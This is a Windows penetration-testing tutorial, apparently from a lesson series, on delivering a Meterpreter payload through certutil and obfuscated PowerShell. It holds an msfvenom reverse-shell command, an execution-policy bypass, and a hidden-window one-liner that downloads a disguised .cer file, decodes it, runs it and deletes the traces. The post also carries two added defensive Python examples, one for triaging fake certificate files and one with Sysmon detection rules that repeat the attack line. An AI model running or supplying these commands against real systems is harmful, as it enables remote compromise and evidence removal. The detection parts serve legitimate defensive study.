# Lesson 44: Supplement on the one-line certutil payload download

Season 8 covered certutil encoding and decoding.

```bash
C:\>certutil -encode c:\downfile.vbs downfile.bat
```

Combined with PowerShell in-memory loading, certutil becomes considerably more powerful.

**Target: Windows 2012**

Today's technique also relies on a PowerShell obfuscation framework:\
<https://github.com/danielbohannon/Invoke-CradleCrafter>

Usage:

```powershell
Import-Module ./Invoke-CradleCrafter.psd1
Invoke-CradleCrafter
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPpZUj5YNm9IAZ2%2Fc62807cec766f0f6c92c2d821cd6ede3.jpg?generation=1551060442722334\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPrtqmvAVFp9Gsa%2F5fd8400f05ad1fe156649bb7d4ab2726.jpg?generation=1551060425703515\&alt=media)

If loading the PowerShell script fails with the error that **PowerShell requires the script to be digitally signed before it can run**, first execute:

```powershell
set-executionpolicy Bypass
```

Generate the payload (payload generation will be covered in a future part of the series):

```bash
root@John:/tmp# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=53 -e cmd/powershell_base64 -f psh -o Micropoor.txt
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPtOwDDDWVo7tOP%2F316a532d526b20050d34d02f8f06e952.jpg?generation=1551060438451285\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPvg1dFvXKOe0Mv%2Fcfa22fb95c6b008829035e91928f47db.jpg?generation=1551060428612795\&alt=media)

**Start Apache:**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPx039TRnJZH_0v%2Fd34911ee8f5ed23aaef4fe39846d7c4d.jpg?generation=1551060441484131\&alt=media)

**PowerShell framework settings:**

SET URL <http://192.168.1.5/Micropoor.txt>\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsPzE5Vq7jUAzJe9%2Fbc3142653214ae8fd411b32efcdb77a8.jpg?generation=1551060437226915\&alt=media)

**MEMORY**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ0hmogCGU_ZSFl%2F62d726b8feae58ada003965ac15cfe4a.jpg?generation=1551060438580290\&alt=media)

**CERTUTIL**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ2LN6YM_7uJ1J1%2Fb700f3bfebafc44073df52b62d79d73c.jpg?generation=1551060450721865\&alt=media)

**ALL**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ4BqYFKQhF1bvD%2F9b29ae29a5bf7fd27b9ded5b889844c4.jpg?generation=1551060429964653\&alt=media)

**1**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ6snDobc5LO3Oj%2Ff14a65e3707c230527b14312400969e0.jpg?generation=1551060427494118\&alt=media)

**Save the obfuscated content to a txt file, then encode it**\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwsQ8yOlLQ60HeJ_g%2F17b242fcc60d1fa5eb54d8f2c6268331.jpg?generation=1551060434077370\&alt=media)

Place cer.cer and Micropoor.txt in the same directory.
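A defender's check that belongs at this step, as an added example that is not part of the original post: a `cer.cer` produced this way is nothing but PEM armour around arbitrary base64, and `certutil -decode` does not care whether the body is a certificate. The code below mimics the `certutil -encode` output format as I understand it (a CERTIFICATE header and footer around base64 split into 64-character lines, CRLF line endings) only to build a sample, then triages a suspect .cer by checking whether the decoded body is a single DER SEQUENCE whose declared length matches the data, which every real X.509 certificate is, or whether it is text hiding behind the labels. The sample stage content is constructed and harmless.

```python
import base64
import re
import string

PEM_HEADER = "-----BEGIN CERTIFICATE-----"
PEM_FOOTER = "-----END CERTIFICATE-----"

# Constructed, harmless stand-in for a decoded "stage.ps1" (not the post's payload).
SAMPLE_STAGE = b"Write-Host 'stage loaded'\r\n"


def certutil_style_encode(data: bytes) -> str:
    """Wrap bytes the way `certutil -encode` does (assumption: CERTIFICATE
    header/footer, 64-char base64 lines, CRLF). Used only to build samples."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([PEM_HEADER, *lines, PEM_FOOTER]) + "\r\n"


def extract_pem_body(text: str) -> bytes:
    """Strip PEM armour and decode the base64 body. The BEGIN/END labels say
    CERTIFICATE no matter what was encoded, so they prove nothing by themselves."""
    body = re.sub(r"-----(BEGIN|END) [^-]+-----", "", text)
    body = re.sub(r"\s+", "", body)
    return base64.b64decode(body, validate=True)


def is_der_sequence(buf: bytes) -> bool:
    """True if buf is exactly one DER SEQUENCE (tag 0x30) whose declared length
    matches the buffer. A real X.509 certificate always passes; a script never does."""
    if len(buf) < 2 or buf[0] != 0x30:
        return False
    first = buf[1]
    if first < 0x80:                      # short-form length
        length, offset = first, 2
    else:                                 # long-form length: 0x8N then N bytes
        n = first & 0x7F
        if n == 0 or n > 4 or len(buf) < 2 + n:
            return False
        length, offset = int.from_bytes(buf[2:2 + n], "big"), 2 + n
    return offset + length == len(buf)


def looks_like_text(buf: bytes) -> bool:
    """Heuristic: decodes as UTF-8 and is almost entirely printable characters."""
    try:
        text = buf.decode("utf-8")
    except UnicodeDecodeError:
        return False
    printable = set(string.printable)
    return bool(text) and sum(c in printable for c in text) / len(text) > 0.95


def classify_cer(text: str) -> dict:
    """Triage a PEM-looking file: is the body a certificate-shaped DER blob,
    plain text (script), or some other binary?"""
    payload = extract_pem_body(text)
    if is_der_sequence(payload):
        verdict = "der-sequence"      # consistent with a genuine certificate
    elif looks_like_text(payload):
        verdict = "text"              # script or other text behind PEM labels
    else:
        verdict = "other-binary"
    return {"verdict": verdict, "size": len(payload), "preview": payload[:40]}


if __name__ == "__main__":
    print(classify_cer(certutil_style_encode(SAMPLE_STAGE)))
```

The DER check is deliberately structural rather than a full X.509 parse: a file that claims to be a certificate but whose body is printable PowerShell is the finding, and a length-consistent SEQUENCE is enough to route the remaining cases to a proper certificate parser.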

**Execute on the target machine:**

```cmd
powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%\cer.cer (New-Object Net.WebClient).DownloadString('http://192.168.1.5/cer.cer'); certutil -decode %APPDATA%\cer.cer %APPDATA%\stage.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%\stage.ps1 & start /b cmd /c del %APPDATA%\cer.cer
```
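From the detection side, as an added example that is not part of the original post: the one-liner above leaves several distinct marks in process-creation telemetry, and the Python below applies rules for each of them to Sysmon Event ID 1 style records (the `Image` and `CommandLine` field names are Sysmon's; the records themselves are constructed). The rules are: `certutil -encode` of a non-certificate or `-decode` into a non-certificate, PowerShell started with a hidden window plus an execution-policy bypass (parameter prefixes such as `-Win` and `-Exec` are matched), a `Net.WebClient` download cradle, the decoded file being handed to `powershell -File` in the same command line, and the encoded input being deleted afterwards. The first sample record is the command above; the others are benign contrast plus the `-encode` line from the start of the post.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 style records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": (
         r"powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%\cer.cer "
         r"(New-Object Net.WebClient).DownloadString('http://192.168.1.5/cer.cer'); "
         r"certutil -decode %APPDATA%\cer.cer %APPDATA%\stage.ps1 & start /b cmd /c "
         r"powershell.exe -Exec Bypass -NoExit -File %APPDATA%\stage.ps1 & "
         r"start /b cmd /c del %APPDATA%\cer.cer")},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify -urlfetch C:\certs\server.cer"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\nightly-backup.ps1"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -encode c:\downfile.vbs downfile.bat"},
]

# Extensions a legitimate certutil -encode/-decode round trip would touch.
CERT_EXTS = {".cer", ".crt", ".pem", ".der", ".p7b", ".pfx", ".p12"}

ARG = r'("[^"]+"|\S+)'                                   # quoted or bare argument
CERTUTIL_CODEC = re.compile(
    r"certutil(?:\.exe)?\s+[-/](encode|decode)\s+" + ARG + r"\s+" + ARG, re.I)
PS_HIDDEN = re.compile(r"-w[a-z]*\s+hidden", re.I)       # -w / -Win / -WindowStyle hidden
PS_BYPASS = re.compile(r"-ex[a-z]*\s+bypass", re.I)      # -Exec / -ExecutionPolicy Bypass
PS_DOWNLOAD = re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I)
PS_FILE = re.compile(r"powershell(?:\.exe)?[^&|;]*?-f(?:ile)?\s+" + ARG, re.I)


def _norm(path: str) -> str:
    return path.strip('"').lower()


def evaluate(cmdline: str) -> list:
    """Return the sorted names of the detection rules that fire on one command line."""
    hits = set()
    is_ps = "powershell" in cmdline.lower()
    for m in CERTUTIL_CODEC.finditer(cmdline):
        verb, infile, outfile = m.group(1).lower(), _norm(m.group(2)), _norm(m.group(3))
        # Encoding a non-certificate, or decoding into one, is the "wrap anything
        # in a fake .cer" pattern rather than certificate handling.
        checked = infile if verb == "encode" else outfile
        if ntpath.splitext(checked)[1] not in CERT_EXTS:
            hits.add("certutil-codec-non-cert")
        if verb == "decode":
            # Decoded output handed straight to powershell -File in the same line.
            if any(_norm(f.group(1)) == outfile for f in PS_FILE.finditer(cmdline)):
                hits.add("decode-then-execute")
            # The encoded input is deleted in the same line: cleanup of evidence.
            if re.search(r"\bdel\b[^&|;]*" + re.escape(infile), cmdline, re.I):
                hits.add("cleanup-of-decoded-input")
    if is_ps and PS_HIDDEN.search(cmdline) and PS_BYPASS.search(cmdline):
        hits.add("powershell-hidden-bypass")
    if is_ps and PS_DOWNLOAD.search(cmdline):
        hits.add("powershell-download-cradle")
    return sorted(hits)


def scan(events) -> list:
    """Apply evaluate() to each record; return (index, image name, rules) per hit."""
    out = []
    for i, ev in enumerate(events):
        rules = evaluate(ev["CommandLine"])
        if rules:
            out.append((i, ntpath.basename(ev["Image"]), rules))
    return out


if __name__ == "__main__":
    for idx, image, rules in scan(SAMPLE_EVENTS):
        print(f"event {idx} ({image}): {', '.join(rules)}")
```

Each rule on its own is noisy (administrators do run `certutil -decode`, and `-ExecutionPolicy Bypass` appears in plenty of deployment scripts); the value is in the combination, so a real pipeline would score the number of rules firing on one command line and escalate when the decode output is the file PowerShell then executes.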

> Micropoor
